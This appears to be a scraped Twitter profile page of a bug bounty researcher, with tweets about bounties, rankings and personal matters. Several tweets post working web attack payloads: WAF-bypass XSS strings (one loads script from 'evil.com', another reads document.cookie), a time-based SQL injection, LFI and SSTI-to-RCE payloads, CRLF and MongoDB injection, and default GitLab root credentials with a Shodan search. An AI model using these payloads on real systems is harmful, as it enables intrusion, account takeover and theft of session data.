Youssef (s3c)
@s3c_krd
Followers
9,076
Following
447
Media
86
Statuses
702
Muslim & Security researcher at hackerone & SRT member & Hackerone Ambassador #bugbounty #hacker #bugbounytips
Kurdistan
Joined December 2018
Don't wanna be here?
Send us removal request.
Explore trending content on Musk Viewer
Madonna
• 161964 Tweets
Amethi
• 94670 Tweets
Bucks
• 78713 Tweets
Knicks
• 68233 Tweets
#無責任でええじゃないかLOVE
• 61659 Tweets
Dame
• 59920 Tweets
Racing
• 57904 Tweets
Pacers
• 48751 Tweets
憲法記念日
• 45593 Tweets
Game 7
• 44485 Tweets
Sixers
• 43055 Tweets
Leafs
• 30624 Tweets
Brunson
• 27962 Tweets
dua lipa
• 25371 Tweets
Bruins
• 24380 Tweets
Rony
• 24126 Tweets
Giannis
• 22830 Tweets
Maxey
• 22797 Tweets
#PONDSXTZUYU
• 21843 Tweets
Estevão
• 19471 Tweets
Willy
• 17842 Tweets
Costas
• 15830 Tweets
76ers
• 15228 Tweets
Arias
• 12713 Tweets
設営完了
• 11757 Tweets
チャレンジクルー
• 11348 Tweets
Romulo
• 10798 Tweets
Buddy Hield
• 10681 Tweets
I have found a new method for account takeover, almost all websites are vulnerable to it.
#bugbounty
59
71
990
SQL injection in one of the biggest shopping website in the world
Payload: 0'XOR(if(now()=sysdate(),sleep(6),0))XOR'
#bugbountytips
#BugBounty
#infosec
#Hackerone
20
193
902
I found 1 click account takeover on TikTok even if you set 2FA on your account it will be bypassed with it😎
#bugbounty
#infosec
#hackerone
40
45
822
27
35
586
40
21
534
Cloudflare bypassed !!!
"-alert(0)-" >>blocked
"-top['al\x65rt']('sailay')-" >>passed
#bountytips
#bugbountytips
#BugBounty
#infosec
18
158
492
I just spent 6 hours on a Cloudflare WAF and finally bypassed it, XSS without using parentheses and Backticks
#XSS
#BugBounty
18
35
478
I am proud to be a part of it and top 1 ethical hacker on tiktok for 2022
#tiktok
#cyberawareness
#cybersecurity
#BugBounty
#infosec
18
32
457
If you found a GitLab instance, try to login as root/admin with those credentials
Username: root & pass: 5iveL!fe
Username: admin & Pass: 5iveL!fe
You can find it with shodan :
org:"Target" http.title:"GitLab"
#bugbountytip
#BugBounty
#infosec
17
161
447
Subdomain Finder Tool, easy way to find subdomains
use it for FREE at
#BugBounty
#bugbountytips
#subdomainfinder
#infosec
26
125
427
S3C - XSSer chrome extension as gift from 7$ month for free now
Download Here
#bugbountytips
#bugbounty
#xss
#infosec
21
116
374
Great Google Hacking Tool! for finding
#XSS
and open redirect vulnerability, use it for FREE at
#bugbountytips
#BugBounty
#infosec
17
116
376
Akami WAF 403 bypassed
Payload:
<img src=x onerror= a=document;cc=a.createElement('script');cc.src='//evil.com/attack.js';a.querySelector('head').append(cc)>
#XSS
#bugbountytips
#bugbounty
#infosec
#CyberSecurity
11
106
312
8
97
312
Always check X-Cache header in response headers if it was HIT you can chain your RXSS to SXSS
#bugbountytips
#bugbounty
#infosec
10
38
281
Local File Inclusion WAF (Cloudflare) bypass ✍️
../../etc/passwd = 403 Forbidden
../../etc/random/../passwd = 200 OK
#BugBounty
#bugbountytips
#infosec
6
78
276
Yay!, I was awarded $5k at
@Hacker0x01
for accessing SMTP , database server and password also cloud lead to RCE via path traversal
#bugbounty
#bugbountytips
#hackerone
#infosec
17
12
277
Finally I got hacking hackers badge with a critical vulnerability :) and hackerone will share more details about it to people as soon as possible
#BugBounty
#infosec
24
11
267
Cross Site Scripting (XSS) Akamai WAF Bypass
try this payload :
<!--><svg+onload=%27top[%2fal%2f%2esource%2b%2fert%2f%2esource](document.cookie)%27>
#BugBounty
#bugbountytips
#infosec
6
77
263
SSTI to RCE payload
{{_self.env.registerUndefinedFilterCallback("exec")}}{{_self.env.getFilter("cat /home/min/user.txt")}}
#BugBounty
#bugbountytip
#infosec
#SSTI
#RCE
4
83
258
I found a Cross-site scripting (XSS) and bypassed the WAF (akamai) on one of the TikTok ads endpoint and could lead it to takeover any account on TikTok ads
#BugBounty
#bugbountytips
8
36
248
Bypass final Payload Cloudflare
<h1/%6f%6e/oNclicK=alert`hacked`>CLICK HERE
#bugbounty
#bugbountytips
#infosec
6
81
249
Payload Https response splitting (CRLF) bypass >> (%E5%98%8A%E5%98%8D) usually it works on websites that use java in the backend.
#bugbountytips
#BugBounty
#infosec
#CyberSec
3
68
244
If you came across SSTI in a go application, it is worth trying the following payload
{{define "T1"}}<script>alert(1)</script>{{end}} {{template "T1"}}
to achieve XSS and bypass HTML sanitization.
#bugbounty
#bugbountytips
#infosec
7
68
227
20
7
206
Waiting for the bounty 😁
Bug type: Bypass Admin panel and access internal information
#bugbountytip
#bugbounty
9
1
193
Payload bypass xss filter char ()
\"><iframe/src=javascript:alert%26%23x000000028%3b)>
#bugbountytips
#BugBounty
#infosec
3
63
186
12
7
186
really it's not fun for me, some
@Hacker0x01
trigger team don't care about reports without understand the report quickly close it as N/A or dups, i had 4 reports it
was closed as dups and i talked with them to closer look at these reports and they was mistake it was not dups.
21
10
182
Yay, I was awarded a $2,500 bounty on
@Hacker0x01
for Hacking Hackerone :)
#TogetherWeHitHarder
#bugbounty
#infosec
#bugbountytips
13
5
168
Payload Vulnerability CRLF to XSS
%0d%0aX-XSS-Protection:0%0d%0aContent-Type:%20text/html%0d%0a%0d%0a%3Chtml%3E%3Cscript%3Ealert%28document.cookie%29%3C%2Fscript%3E%3C%21--
#BugBounty
#bugbountytips
#infosec
#hacking
3
63
153
New Great
#Tool
, open redirect
#bypass
with must power full bypasses it works for me most of the times, use it for FREE at
#bugbountytips
#bugbounty
#infosec
2
60
158
I am happy, I am invited to participate in h1-702!
@Hacker0x01
live hacking event but due visa problems i will participate virtually
#BugBounty
#infosec
12
2
142
I just fixed the errors chrome extension
#s3cXSSer
and now you can use it again
#XSS
#BugBounty
#bugbountytips
2
35
128
TikTok and multiple companies have offered me a job based on my bug bounty experience.
#BugBounty
@sk1dd13
Been saying this for a while now dude. It's the most true statement ever. Some people think that bug bounties look great on a resume, but the truth is, recruiters don't give a flying shit about them. They don't consider it experience.
Not my personal opinion. Just straight facts
14
1
20
4
1
129
XSS Using the <iframe> srcdoc Attribute:
<iframe srcdoc="<script>alert('XSS')</script>"></iframe>
#bugbountytips
#bugbounty
#infosec
2
15
126
New achievement in 2023 💥
2023: 1 click ATO
@Snapchat
🔥
2022: 1 click ATO
@tiktok_us
2021: 1 click ATO
@amazon
and
@ESEA
2020: 0 click ATO
@Zoom
2019: 1 click ATO
@unity
#bugbountytips
#togetherwehitharder
#bugbounty
3
1
115
8
1
100
In October, I submitted 54 vulnerabilities to 44 programs on
@Hacker0x01
.
#TogetherWeHitHarder
5
1
89
Today is birthday of prophet muhammad, congratulation to all muslims.
#Quran
#prophetmohammed
5
5
79
Thanks to
@Jayesh25_
and
@Rhynorater
for inspiring me to resend the report, and this time it got accepted internally.
#bugbounty
6
2
80
In 2023, it was a fantastic year! I managed to find a one-click account takeover with the ability to bypass 2FA on Snapchat, and I found a critical vuln on HackerOne. In total, I submitted 65 reports through my part-time bug bounty efforts, earning a significant amount of $$$$
5
2
76
When you virtually participated in H1 LHE and reported a complex bug 😂(H1702) in 2022
#bugbounty
1
1
75
3 months ago reported >> need more info >> self close >> today triaged as critical 😄
Bug type: sensitive information exposed
#BugBounty
#bugbountytips
#hackerone
1
0
74
I am pleased to announce that I am the new ambassador of Iraq at
@Hacker0x01
. For all fellow hackers from Iraq, if you would like to join our team, please DM me.
EMEA Pt. 1
@dee__see
Ireland 🇮🇪
@rotembar
Israel 🇮🇱
@val_brux
Portugal 🇵🇹
@GreenJamSec
U.K. 🇬🇧
@njcve_
U.K. 🇬🇧
@gregxsunday
Poland 🇵🇱
@_lauritz_
Germany 🇩🇪
@s3c_krd
Iraq 🇮🇶
9
2
35
11
3
72
Just in one week my tools have been used by 3.2k users, most of the users are form india and US. I hope it help you to find vulnerabilities.
#XSS
#LFI
#RCE
#SQLinjection
#bugbountytips
#BugBounty
1
18
72
Just spend 5 hours collaboration with
@zhenwarx
@moe1n1
@siratsami71
and found multiple bugs together
#BugBounty
#bugbountytip
4
5
69
The best bug bounty program is
@amazon
when i was found a high bug on there service and i asked them to increase the bounty and they said when we updated the bounty table we will pay you double and they did it 😊
#BugBounty
#bugbountytips
1
0
69
Is it good idea?!
removed from 7 program due to new country restrictions.
#bugbounty
#hackerone
12
1
70
6
4
67
CSRF bypass TIP - If a protection based origin check and null origin allowed try send the request via data protocol it will send null origin
Example:
data:text/html;base64,…..
#bugbountytips
#bugsbunny
#infosec
2
21
66
4
3
64
5
1
65
S3c xsser - For finding GET/POST method XSS without WAF detect it
1-month 7$
2-month 12$
3-month 18$
contact to buy s3c
@wearehackerone
.com
Demo
#bugbountytips
#infosec
#bugbounty
#xss
1
20
59
Some BB program trigger in
@Hacker0x01
doesn’t know what’s security bug and what’s not
#BugBounty
#infosec
6
3
55
4
7
60
The article about How i hacked world wide Zoom users for who didn’t read it.
#bugbountytips
#bugbounty
#zoom
#infosec
$zm
#CyberSecurity
2
15
48
1
5
50
1
1
45
If you have a case block JavaScript:.* () ‘ DM for collaboration because if I share it with the public it will be fixed
12
0
43
5
2
39
Finally, I entered the top 2 of TikTok and thanks to
@lu3ky13
@zhenwarx
@johnsto44673062
for collaboration
@Hacker0x01
@tiktok_us
#BugBounty
#togetherwehitharder
7
0
36
1
1
38
In January, I submitted 19 vulnerabilities to 18 programs on
@Hacker0x01
.
#TogetherWeHitHarder
0
0
35
It was mongodb injection >> payloads
list[][$lt]=0 => FALSE
List[][$in][]=patch => TRUE
List[][$nin][]=patch => FALSE
List[][$lt]=0 => FALSE
#bugbountytips
3
2
34
Rank 7 ✌️🔥
It's the final push of
#H1702
! Follow along with the Day 3 leaderboard all day to see who is making their way to the top. 👀
4
10
80
2
0
25
Kurdish bug bounty community at telegram join us and share tips with each other
#BugBounty
#bugbountytips
#kurdishbugbounty
4
0
21
The ATM machine hacking was a great presentation✌️, glad to meet such a creative and smart team
🏜️ We're live at
#GISEC2024
in Dubai, UAE!
Join PT SWARM for a master class on soldering your smart 🥤 opener or enjoy our ATM hacking contest! 📠
Catch us until April 25 at 5 PM! 🇦🇪
3
6
24
0
0
21
Excited to be attending
@GISECGlobal
cybersecurity conference! If you're here too and want to connect, let me know. Would love to meet fellow cybersecurity enthusiasts and exchange ideas!
#GISEC
#Cybersecurity
#BugBounty
#infosec
1
1
20
I hope
@Hacker0x01
add
@okx
for payment methods instead coinbase because our accounts stopped in coinbase without any reason,
@jobertabma
@martenmickos
As the most trusted and secure crypto platform, we regularly monitor our systems and actively manage our product to provide the best user experience. In the course of a recent routine review of our systems, we identified some accounts that no longer meet our updated standards.
118
21
103
5
0
20
@Shajjad10853937
Thank you, I think if TikTok haram and other social media apps haram too because all have bad and good content and it depends on the person what they are sharing there are lots of useful accounts using TikTok for good and sharing the Quran and useful content, and for bad too
1
0
19
3
0
18
0
0
17
